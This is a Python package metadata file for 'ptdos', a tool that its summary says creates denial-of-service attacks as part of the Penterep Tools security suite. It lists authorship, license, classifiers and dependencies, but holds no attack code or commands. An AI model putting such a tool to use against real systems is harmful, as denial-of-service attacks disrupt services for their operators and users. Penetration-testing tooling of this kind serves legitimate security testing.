Metadata-Version: 2.1
Name: ptdos
Version: 0.1.1
Summary: Application ptdos is used for creation of DoS attacks. It is part of complex system Penterep Tools.
Home-page: https://www.penterep.com/
Author: Penterep
Author-email: xkamen19@vutbr.cz
License: GPLv3
Project-URL: Source, https://github.com/FilipKam/ptdos
Classifier: License :: OSI Approved :: GNU General Public License v3 (GPLv3)
Classifier: Programming Language :: Python :: 3.10
Classifier: Environment :: Console
Classifier: Development Status :: 5 - Production/Stable
Classifier: Natural Language :: English
Classifier: Operating System :: POSIX :: Linux
Classifier: Operating System :: MacOS :: MacOS X
Classifier: Topic :: Security
Classifier: Topic :: Utilities
Requires-Python: >=3.10.0
License-File: LICENSE
Requires-Dist: ptlibs <2,>=1.0.5
Requires-Dist: validators >=0.18.2
Requires-Dist: impacket >=0.9.24
